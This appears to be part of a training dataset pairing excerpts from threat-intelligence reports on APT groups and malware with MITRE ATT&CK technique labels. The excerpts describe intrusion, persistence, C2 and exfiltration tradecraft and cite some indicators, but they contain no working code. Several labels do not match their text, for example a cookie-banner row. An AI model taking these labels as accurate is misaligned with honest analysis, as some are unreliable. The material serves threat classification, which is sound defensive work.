| 763 | In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Therefore, the Cobalt group registered domains are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Additional means of circumventing anti-virus tools include the use of exploits to increase the level of rights and privileges, bypassing UAC, and injecting code into trusted processes. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed | ['T1068 - Exploitation for Privilege Escalation'] | fine_tune |
| 764 | The dropped payload is a DLL file that has been packed using the UPX packer. The unpacked sample is highly obfuscated and important API calls and strings have been encrypted using a custom encryption algorithm. Whenever in the code the malware needs to use a string, it takes the encrypted string and passes it into two functions to decrypt it | ['T1027.002 - Obfuscated Files or Information: Software Packing'] | fine_tune |
| 765 | This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim’s system regardless whether macros are enabled | ['T1559.002 - Inter-Process Communication: Dynamic Data Exchange'] | fine_tune |
| 766 | POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry key. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 767 | A batch file that is used to run Bitsadmin and Rundll to download and execute the Egregor payload. A Zip file contains a binary file that is an RClone client, renamed svchost, and RClone config files (webdav, ftp and dropbox) used later for exfiltration | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 768 | The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the following capabilities | ['T1049 - System Network Connections Discovery', 'T1518 - Software Discovery', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 769 | The archive contains two files; the first is an executable file, while the second is a decoy PDF document. The bear’s lair . The Stage-1 downloader will download and execute a new downloader, written in C++, not so different from other Zebrocy downloaders. How the bear hunts . In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor. As we did not identify a pattern in the order which the commands are invoked, we believe the operators are executing them manually. The first set of commands gathers information about the victim’s computer and environment: The commands above are commonly executed when the operators first connect to a newly activated backdoor. Moreover, the backdoor contains a list of filenames related to credentials from software listed below (database names): The operators take care of retrieving these databases if they are present on the victim’s computer. The operators retrieve these files on the machine using the DOWNLOAD_LIST command. This command can be used when the operators are aware of the presence of interesting files on the computer. This backdoor is executed using the CMD_EXECUTE command: There are some interesting facts here. The first set of commands is the same and executed during a very short timeframe, which raises another question: is it automated | ['T1083 - File and Directory Discovery'] | fine_tune |
| 770 | The reason for this is that most of the file comprises meaningless overlay data, since the file is an automatically generated AutoIT executable with an AutoIT3 script embedded inside. Once started, it downloads additional malware from the C2 and also uploads some basic system information, stealing, among other things, the user’s Google Chrome credentials. The backdoor also pings the C2 server at regular intervals. A good security analyst can spot this while analyzing firewall log files and thereby find out that something suspicious might be going on in the network | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 771 | Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the ‘at' or ‘schtask' commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 772 | This structure parses out executable scripts from data provided via a remote operator. In this case, the REGEX value indicates this implant will receive scripts compressed (tar files). The malware will then decompress them before executing the embedded script. Analysis indicates the WellMail implant is similar in design and structure to the WellMess implant -- and both accept and execute shell scripts from a remote operator | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 773 | Narrow attacks targeted the Automotive industry among others, while the large malicious spam campaigns appear to be associated with threat actor TA505, an actor responsible for many large-scale attacks since at least 2014 | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 774 | We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack | ['T1204.001 - Malicious Link', 'T1566.002 - Phishing: Spearphishing Link', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1566.002 - Phishing: Spearphishing Link', 'T1120 - Peripheral Device Discovery'] | fine_tune |
| 775 | Finally, the malware changes the password of the local users. In the files analyzed, all the passwords chosen by the actor have the same pattern: Aa153 | ['T1531 - Account Access Removal'] | fine_tune |
| 776 | The configuration file for Torisma is encrypted using the algorithm VEST[1] in addition to the communication sent over the C2 channel. From our research this encryption method is not commonly used anywhere, in fact it was a proposed cipher that did not become a standard to be implemented in general technologies[2 | ['T1041 - Exfiltration Over C2 Channel', 'T1573.001 - Symmetric Cryptography'] | fine_tune |
| 777 | In response to historical disclosures detailing TA416 PlugX malware infection and encoding methods, the group appears to have adopted a rapid rate of development for their PlugX payloads. The group uses different legitimate PE files to initiate sideloading, as well as a variety of PlugX DLL loaders including the PotPlayer and DocCon versions noted in this publication. TA416 also uses different variants of the final PlugX payload in which the communication routines are observed to be different when closely analyzed. Additionally, the payload DAT file decryption method has evolved regularly since the beginning of 2022. Several observed decryption schemas and a sample configuration are included below with date ranges detailing the evolution of observed PlugX payloads | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 778 | Usually, after infection the bot sends a ‘PING’ message, ‘SYSTEM INFO’ message and ‘ASK for COMMAND’ message, and the C2 replies with ‘ACK’ and ‘COMMAND’ messages. If additional modules were pushed by the C2, the bot sends a ‘STOLEN INFO’ message containing data stolen by the modules | ['T1041 - Exfiltration Over C2 Channel'] | fine_tune |
| 779 | The malware can use 2 different public RSA keys: one exported using the crypto api in a public blob or using the embedded in base64 in the malware. The malware will only use the second one if it cannot create the crypto context or has some problem with the crypto api functions | ['T1106 - Native API'] | fine_tune |
| 780 | Pillowmint is usually installed through a malicious shim database which allows the malware to persist in the system | ['T1546.011 - Event Triggered Execution: Application Shimming'] | fine_tune |
| 781 | 1) An application is bundled with virtualization software, a Linux image and additional files used to achieve persistence. 2) User downloads the application and follows attached instructions on how to install it. 3) LoudMiner is installed first, the actual VST software after. 4) LoudMiner hides itself and becomes persistent on reboot. 5) The Linux virtual machine is launched and the mining starts. 6) Scripts inside the virtual machine can contact the C&C server to update the miner (configuration and binaries | ['T1569.002 - System Services: Service Execution', 'T1218.007 - Signed Binary Proxy Execution: Msiexec'] | fine_tune |
| 782 | Once on the network, the attackers engaged in network reconnaissance and retrieved a list of trusted domains and a list of domain controllers with the following commands | ['T1482 - Domain Trust Discovery'] | fine_tune |
| 783 | When REvil was first discovered, it was delivered to targets via exploitation of Oracle WebLogic vulnerabilities. There are reports that the threat actors leveraged a strategic web compromise (SWC) to deliver REvil by compromising the Italian WinRAR . it website and replacing the WinRAR installation executable with an instance of the malware. The SWC resulted in the infection of unsuspecting WinRAR customers' systems. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers. The diversity and complexity of delivery mechanisms employed by the REvil threat actors in a short period of time suggest a high level of sophistication | ['T1189 - Drive-by Compromise'] | fine_tune |
| 784 | ZxShell.dll is injected in a shared SVCHOST process. The Svchost group registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost is opened and the netsvc group value data is queried to generate a name for the service | ['T1055.001 - Process Injection: Dynamic-link Library Injection'] | fine_tune |
| 785 | MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks | ['T1614.001 - System Location Discovery: System Language Discovery', 'T1082 - System Information Discovery'] | fine_tune |
| 786 | DriveSlayer is digitally signed using a valid certificate and also abuses a legitimate EaseUS Partition Master driver to gain raw disk access and manipulate the disk to make the system inoperable | ['T1553.002 - Code Signing'] | fine_tune |
| 787 | Like any other typical PoS malware, Pillowmint iterates a list of processes and process them two at a time. it uses the API OpenProcess() using the PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle then reads the memory’s content via ReadProcessMemory() API two chunks at a time. Depending on the Pillowmint version, it may encrypt the stolen CC data with AES encryption algorithm + Base64. This is then written to a file named "ldb_e.log" in Windows System directory | ['T1106 - Native API'] | fine_tune |
| 788 | Along with the EDRPOU numbers, the backdoor collects proxy and email settings, including usernames and passwords, from the M.E.Doc application | ['T1087.003 - Email Account'] | fine_tune |
| 789 | Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations | ['T1588.002 - Tool'] | fine_tune |
| 790 | Once the Bazar loader downloads its payload, the Bazar backdoor, it is decrypted using the same method as the aforementioned Team9 variant | ['T1104 - Multi-Stage Channels'] | fine_tune |
| 791 | For the investigators at NCC Group and Fox-IT these pieces of evidence supported the hypothesis of the adversary achieving credentials access by brute force, and more specifically by credential stuffing or password spraying | ['T1589.001 - Credentials'] | fine_tune |
| 792 | Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. At the time of writing, tmate sessions are the only way the attacker interacts with the compromised containers | ['T1219 - Remote Access Software', 'T1219 - Remote Access Software'] | fine_tune |
| 793 | After loading its configuration data, GoldMax checks the current date-time value of the compromised system against the activation date from the configuration data | ['T1016 - System Network Configuration Discovery', 'T1497.003 - Time Based Evasion', 'T1124 - System Time Discovery'] | fine_tune |
| 794 | Once the VBScript in XSL has been run, console commands launched by the JS code continue to be executed. Three files are copied into the folder OFFICE12 that was created in the user profile. Those files are | ['T1220 - XSL Script Processing'] | fine_tune |
| 795 | POSHSPY makes the most of using built-in Windows features – so-called “living off the land” – to make an especially stealthy backdoor. POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory. The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 796 | The attack typically begins with an attempt – most probably via a spearphishing email – to lure the intended victim into running the malicious dropper, which is attached to the email. In order to increase the likelihood that the unsuspecting victim will actually click on it, the malicious executable masquerades as a document or spreadsheet by displaying a fake icon | ['T1566.001 - Phishing: Spearphishing Attachment', 'T1204.002 - User Execution: Malicious File'] | fine_tune |
| 797 | From the main function, the malware invokes a function named eiht_get_update. This function attempts to read a remote file (ret.txt) from andrewka6.pythonanywhere.com that contained the address of the remote command and control server. If that failed, the malware would default to using the hard-coded (albeit encrypted) IP address 167.71.237.219. In order to gather information about the infected host, it invokes a function named: ei_get_host_info …which in turn invokes various macOS APIs such as getlogin and gethostname | ['T1620 - Reflective Code Loading'] | fine_tune |
| 798 | It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language | ['T1082 - System Information Discovery'] | fine_tune |
| 799 | On February 12, 2018 at 16:45 (all times are in the organization’s local time), an email was sent to the organization advertising a job vacancy at an American global service provider. The email contained a malicious link to hxxp://mynetwork.ddns[DOT].net:880 | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 800 | Figure 3 outlines the architecture of Crutch version 3. It includes a backdoor that communicates with a hardcoded Dropbox account using the official HTTP API. In some variants, we noticed the presence of recovery C&C channels using either GitHub or a regular domain | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 801 | Loader Trojan The payload dropped to the system by the macro is an executable that is responsible for installing and executing a dynamic link library (DLL) to the system. The loader has several coding features that make it interesting. Upon execution, the loader will decrypt the embedded payload (DLL) using a custom algorithm followed by decompressing it using the RtlDecompressBuffer API. This API is normally used for Windows drivers, but there is nothing to prevent a userland process from using it, and the parameters are documented on MSDN. The compression algorithm used is LZNT1 with maximum compression level. The payload is decrypted using a starting 10-byte XOR key of: 0x3950BE2CD37B2C7CCBF8. The payload is in the loader at file offset: 0x19880 - 0x1F23C size of 0x59BD. The payload can be decrypted and decompressed with the following Python script | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 802 | After analyzing the final payload, we determined the winner was… a Remote Administration Tool, which we have named ROKRAT. The address used in the email was 'kgf2016@yonsei.ac.kr' which is the contact email of the Korea Global Forum where the slogan in 2016 was "Peace and Unification of the Korean Peninsula". This fact gives more credit and legitimacy to the email. This file is decoded and finally an executable is launched: ROKRAT. This RAT has the added complexity that the command and control servers are legitimate websites. The malware uses Twitter and two cloud platforms, Yandex and Mediafire, apparently for both C2 communications and exfiltration platforms. Unfortunately, these platforms are difficult to block globally within organizations as their use can be viewed as legitimate in most cases. Additionally, these 3 platforms all make use of HTTPS connectivity, making it much more difficult to identify specific patterns or the usage of specific tokens | ['T1102.002 - Bidirectional Communication'] | fine_tune |
| 803 | Skip to main content . We use optional cookies to improve your experience on our websites, such as through social media connections, and to display personalized advertising based on your online activity. If you reject optional cookies, only cookies necessary to provide you the services will be used. Using reg to configure the registry of remote computers limits the parameters that you can use in some operations. Check the syntax and parameters for each operation to verify that they can be used on remote computers . In this article | ['T1112 - Modify Registry', 'T1012 - Query Registry'] | fine_tune |
| 804 | Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) — This simple downloader's code is similar to the main xxmm payload. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. DGet — This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 805 | All the network parameters are stored in the sample and can be easily updated by the author. The CnC is a web server: http://camilleoconnell[.]website The network communication is performed in HTTP. The malware uses an hardcoded User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) To register a new infected system the malware perform a POST request to /api/white_walkers/new with data on the compromised system consisting of | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 806 | The SodomMain module is LookBack malware’s remote access Trojan module that can send and receive numerous commands indicative of its function as a RAT. The malware is delivered within the encoded data that is received by the SodomNormal module as part of its initial beacon response. It then runs within the SodomNormal module and uses its “send_data” function for C&C communications | ['T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
| 807 | Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - Screen Capture Tool— This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Screen Capture Tool usage. Source: Secureworks) - RarStar — This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR — This tool extracts tools for lateral movement and compresses data for exfiltration. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Install a background monitor tool (e.g | ['T1113 - Screen Capture'] | fine_tune |
| 808 | The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts. It then opens the registry key 'Software\Microsoft\Windows NT\CurrentVersion\Winlogon' and sets the value to the "Shell" subkey to the previously created string. Ultimately, the following registry key is created for persistence | ['T1547.014 - Active Setup', 'T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL'] | fine_tune |
| 809 | We at Team Nautilus detected and analyzed the Docker Hub account hildeteamtnt, which was used by TeamTNT to store their malicious images. Also, ‘minerescape’ contained a shell script executing a Python file - minedaemon.py. Using a web service (iplogger[.]org) to transmit collected data to the attacker during the discovery process, for instance, the number of cores in the CPU, its speed, system details (using uname -a), and targeted host IP address. Logging the activity and encoding it into files (using Base64). The script sbs.sh: - Downloading 00.jpg (as /usr/bin/dns_ipv4.tar.gz) which is the file /usr/bin/bioset. Creating a child process that listens to the socket and communicates with the father using a method called ‘Named PIPE’ (also known as FIFO). The father is responsible for deciphering messages and writing it back to the child on the PIPE. Creating a child process that listens to the socket and communicates with the father using a method called ‘Named PIPE’ (also known as FIFO). - The father is responsible for deciphering messages and writing it back to the child on the PIPE. Logging the activity and encoding it into files (using Base64). - Defense Evasion: Deleting command history. Logging the activity and encoding it into files (using Base64). Defense Evasion Techniques: Removing system logs (/var/log/syslog). Deleting command history. Logging the activity and encoding it into files (using Base64). - Defense Evasion Techniques: Removing system logs (/var/log/syslog). Deleting command history. Encoding many snippets with base64 (the same snippet may be encoded multiple times). To sum it up . Over four months, TeamTNT uploaded various images, with some being used to perform attacks in the wild | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 810 | In September 2017, Proofpoint researchers detailed the history and ongoing activities of an actor we track as TA505. TA505 was behind many of the Dridex campaigns that plagued organizations in 2015 and introduced Locky ransomware in 2016, bringing unprecedented scale to malicious spam distribution. Since we wrote our original TA505 profile, the actor has continued to explore the use of new malicious attachments and new payloads. In 2018, though, the scale and regularity of their campaigns decreased, while the diversity of payloads has increased. Given the importance of this actor in the email threat landscape we wanted to revisit our profile and update it with the latest activity from TA505 | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 811 | Remember, Downadup/Conficker spread so widely because so many computers simply did not have a simple security patch, released months before the infections ever started, applied. Weafer ). - Use a robust security software suite that has multiple layers of protection. Even patched systems are continuing to become infected with the .A and .B variants. In many instances, this is occurring because the worm is being passed on via infected removable media, such as USB thumb drives, that are essentially acting as host carriers. Need to Know) - Use caution when opening attachments and accepting file transfers. Use caution when clicking on links to Web pages. Use strong passwords | ['T1091 - Replication Through Removable Media'] | fine_tune |
| 812 | FIN6 used encoded PowerShell commands to install Cobalt Strike on compromised systems. The attacker made use of Cobalt Strike’s “psexec” lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell. In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps://pastebin[.]com | ['T1102 - Web Service', 'T1569.002 - System Services: Service Execution'] | fine_tune |
| 813 | At this point, the script establishes an HTTP connection to the C2 server. If the server response is comprised only of the same GUID that the malware sent, the script deletes itself. In the case of the second-stage script from Variant A, the script deletes the registry key where it is installed. In the case of Variant C, the script deletes the file from which it is running. If instead the server responds with any data other than the GUID, the second-stage script decrypts the data and saves it as a file | ['T1070.004 - Indicator Removal on Host: File Deletion', 'T1070 - Indicator Removal on Host'] | fine_tune |
| 814 | Since the original publication of this approach, Proofpoint researchers have observed a number of actors -- “early adopters” -- abusing this file format by embedding it inside Microsoft Word and PDF documents. While the combination of the technique with the Microsoft Word container was described in the initial research, embedding inside PDFs has not been documented and likely originated with another source | ['T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File'] | fine_tune |
| 815 | Then extract the image file "image1.jpeg" contained in the document. Find the special logo in the picture data, decode the subsequent steganographic PE data, release the randomly named .exe in the %ALLUSERSPROFILE% directory and run it | ['T1027.003 - Steganography'] | fine_tune |
| 816 | Enables remote login - Enables screen sharing - Configures remote login permissions for the user - Allows remote login to all - Enables a hidden “root” account in macOS and sets the password specified in the Trojan code | ['T1569.001 - System Services: Launchctl'] | fine_tune |
| 817 | The persistence is done during the first execution of the malware using a well-known technique, the “Logon scripts”. It creates a script file registration.bat and writes several strings from the TForm1 object. The final script is | ['T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)'] | fine_tune |
| 818 | The backdoor starts by collecting basic information about the victim’s machine and calculating a 4-byte long victim identifier, based on the user-name, computer-name and the domain name of the target environment | ['T1082 - System Information Discovery'] | fine_tune |
| 819 | To install Weave Scope on the server the attackers use an exposed Docker API port and create a new privileged container with a clean Ubuntu image. The container is configured to mount the file system of the container to the filesystem of the victim server, thus gaining the attackers access to all files on the server. The initial command given to the container is to download and execute several cryptominers | ['T1611 - Escape to Host'] | fine_tune |
| 820 | Watering holes - Weaponized documents exploiting the Dynamic Data Exchange (DDE) method - Weaponized documents exploiting the CVE-2018-0798 vulnerability in Equation Editor - Exploitation of the CVE-2019-0604 vulnerability in Sharepoint - Supply chain attack that compromises a chat software installer, Able Desktop - Exploitation of recent vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server | ['T1195.002 - Compromise Software Supply Chain', 'T1190 - Exploit Public-Facing Application'] | fine_tune |
| 821 | This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011 | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 822 | Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module. However, as it is far from stealthy, in the long run it is no match for a capable organization. The variety of tools Gamaredon has at its disposal can be very effective at fingerprinting a machine and understanding what sensitive data is available, then spreading throughout the network | ['T1025 - Data from Removable Media'] | fine_tune |
| 823 | The communication between the malware and the server is based on the HTTP protocol and slightly varies between the samples. Every few seconds the backdoor sends a POST request to the C&C URL. The result is encrypted and sent back to another URL on the server as the parameter of a POST request | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 824 | Check for blocklisted usernames and computernames: The implant concatenates the username and computer it acquires from the infected endpoint's environment variables. This string is then checked against a list of blocklisted values to determine if the implant should continue execution or exit out. Check for blocklisted process names: The following process names are blocklisted and if found running on the system, the RAT implant will simply exit. The blocklist consists of processes belonging to Virtual Machine software (such as VMWare) and analysis tools (such as ProcessHacker etc | ['T1033 - System Owner/User Discovery', 'T1057 - Process Discovery', 'T1082 - System Information Discovery', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks'] | fine_tune |
| 825 | It also creates a unique system specific identifier that it will use during the C2 communications to send and receive messages. The system specific identifier is a 16 character string that the Trojan creates using the serial number of the C volume and the first 4 hexadecimal bytes from Environment.UserName | ['T1071.003 - Mail Protocols'] | fine_tune |
| 826 | This document uses KernelCallbackTable as well to hijack the control flow just like our first module, the injection technique used by the shellcode also resembles the first document. The major difference in this document is that it tries to retrieve a remote HTML page and then executes it using mshta.exe. The remote HTML page is located at https[:]//markettrendingcenter[.]com/member.htm and throws a 404 Not Found which makes it difficult for us to analyze this document any further | ['T1218.005 - Signed Binary Proxy Execution: Mshta'] | fine_tune |
| 827 | 2) Download the OpenSSL library. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file | ['T1016.001 - System Network Configuration Discovery: Internet Connection Discovery'] | fine_tune |
| 828 | This script is executed and is used to decode a static base64 string within the strEncode variable. Using base64 encoding the decoded binary is stored as HncModuleUpdate.exe and is then executed. This specific resource contains malicious shellcode used by the malware. These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process | ['T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 829 | In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The malicious attachment was a simple PE file (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63) with the filename <redacted> Technical Services.exe. Its sole purpose here is to install the QUADAGENT backdoor and execute it. Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails | ['T1204.001 - Malicious Link'] | fine_tune |
| 830 | From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed | ['T1070.004 - Indicator Removal on Host: File Deletion', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs'] | fine_tune |
| 831 | BackdoorDiplomacy is a group that primarily targets diplomatic organizations in the Middle East and Africa, and less frequently, telecommunication companies. Their initial attack methodology is focused on exploiting vulnerable internet-exposed applications on webservers, in order to drop and execute a webshell. Post compromise, via the webshell, BackdoorDiplomacy deploys open-source software for reconnaissance and information gathering, and favors the use of DLL search order hijacking to install its backdoor, Turian. Finally, BackdoorDiplomacy employs a separate executable to detect removable media, likely USB flash drives, and copy their contents to the main drive’s recycle bin | ['T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking'] | fine_tune |
| 832 | It will use an auto-run registry (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run) named AdobeMX that will execute PowerShell to load the encoded executable via reflective loading (loading an executable from memory rather than from the system’s disks | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 833 | Change file owner and group. This utility is used by malware to change the user ID and/or the group ID of the specified files. This can lock other users’ out of access to the file, thus hampering removal or inspection. It may also be required in order to execute a file in certain, elevated context | ['T1562.001 - Impair Defenses: Disable or Modify Tools'] | fine_tune |
| 834 | The iContact binary appears to be a backdoor that gathers user and locale data and engages in encrypted communications with a C2 server over TCP. Functionality includes sending and receiving files and running custom commands such as scanning a directory and deleting files | ['T1005 - Data from Local System'] | fine_tune |
| 835 | Overview of discovered Ramsay versions . Malicious documents dropping Ramsay version 1 . This attack vector consists of malicious documents exploiting CVE-2017-0199 intended to drop an older version of Ramsay. Based on the low complexity of the Ramsay agent delivered, the threat actors may be embedding this specific instance within these malicious documents for evaluation purposes. Even though affected documents will be modified, it won’t impact their integrity; each affected Word document remains fully operational after artifact appending has taken place. First, Ramsay looks for Word documents and also, in more recent versions, for PDFs and ZIP archives: Figure 13. Hex-Rays output of spreader scanning routines . It is important to notice that there is a correlation between the target drives Ramsay scans for propagation and control document retrieval. File structure changes during an infection and execution . All of the different artifacts involved in the infection stage are either within the context of the spreader or dropped previously by another Ramsay component. This information will be contained within all logged information Ramsay collects and may be leveraged by operators in order to do further lateral movement over the network in a later stage via a different channel. Some of Ramsay and Retro filename convention . Is important to highlight that among Retro’s documented techniques, it leverages malicious instances of msfte.dll, oci.dll and lame_enc.dll, and via Phantom DLL Hijacking. As previously documented, Ramsay also uses this technique in some of its versions also using msfte.dll and oci.dll. Finally, we noticed Korean language metadata within the malicious documents leveraged by Ramsay, denoting the use of Korean-based templates | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 836 | When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to “rescue” each other if communications are lost with one of the backdoors | ['T1124 - System Time Discovery', 'T1057 - Process Discovery', 'T1049 - System Network Connections Discovery', 'T1018 - Remote System Discovery'] | fine_tune |
